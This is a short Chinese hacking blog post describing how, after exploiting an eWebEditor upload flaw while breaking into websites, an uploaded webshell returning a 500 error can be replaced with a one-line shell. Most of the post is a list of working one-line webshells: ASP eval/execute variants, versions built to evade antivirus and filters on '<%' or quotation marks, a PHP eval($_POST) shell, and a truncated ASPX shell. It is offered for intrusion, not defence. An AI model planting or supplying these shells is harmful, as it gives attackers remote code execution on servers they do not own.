应对eWebEditor漏洞上传文件500错误的方法

来源:van
相信大家对eWeb并不陌生

大家在搞站的可否发现有的uploadfiles目录里面传上去的大马或小马是500错误

入侵了这么久,发现在此情况下,上传一句话,可以连接!

eval的一句话有时候会失败

execute的一句话基本上都是成功的!

By:van

附:(多种写一句话的方法)

ASP一句话
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>

免杀大部分网站的一句话
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>

免杀部分网站过略<%,%>的一句话
5.<script language=VBScript runat=server>execute request("YouPass")</script%gt;

免杀部分网站过略双引号的一句话
6.<%eval request(YouPass(35))%>

php一句话
7.<?php eval($_POST[YouPass]);?>

aspx一句话
8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("

你可能感兴趣的:(职场,休闲)